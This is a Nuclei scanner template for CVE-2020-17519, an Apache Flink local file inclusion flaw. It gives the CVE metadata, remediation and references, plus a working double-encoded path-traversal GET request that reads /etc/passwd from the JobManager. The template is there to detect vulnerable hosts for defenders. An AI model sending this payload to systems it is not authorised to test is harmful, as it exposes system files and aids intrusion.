id: CVE-2020-17519

info:
  name: Apache Flink - Local File Inclusion
  author: pdteam
  severity: high
  description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.
  reference:
    - https://github.com/B1anda0/CVE-2020-17519
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17519
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-17519
    cwe-id: CWE-552
    epss-score: 0.97103
    epss-percentile: 0.99737
    cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: flink
  tags: cve,cve2020,apache,lfi,flink

http:
  - method: GET
    path:
      - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204b890b4ec1857214ffda11340aa1a4661bbb5dc35de8a1740ccd531d92910d26022008bfdeb53b6cdc73ff693a31a0ee9b55e4aa92c53dfe39bc0349491462a4f66c:922c64590222798bb761d5b6d8e72950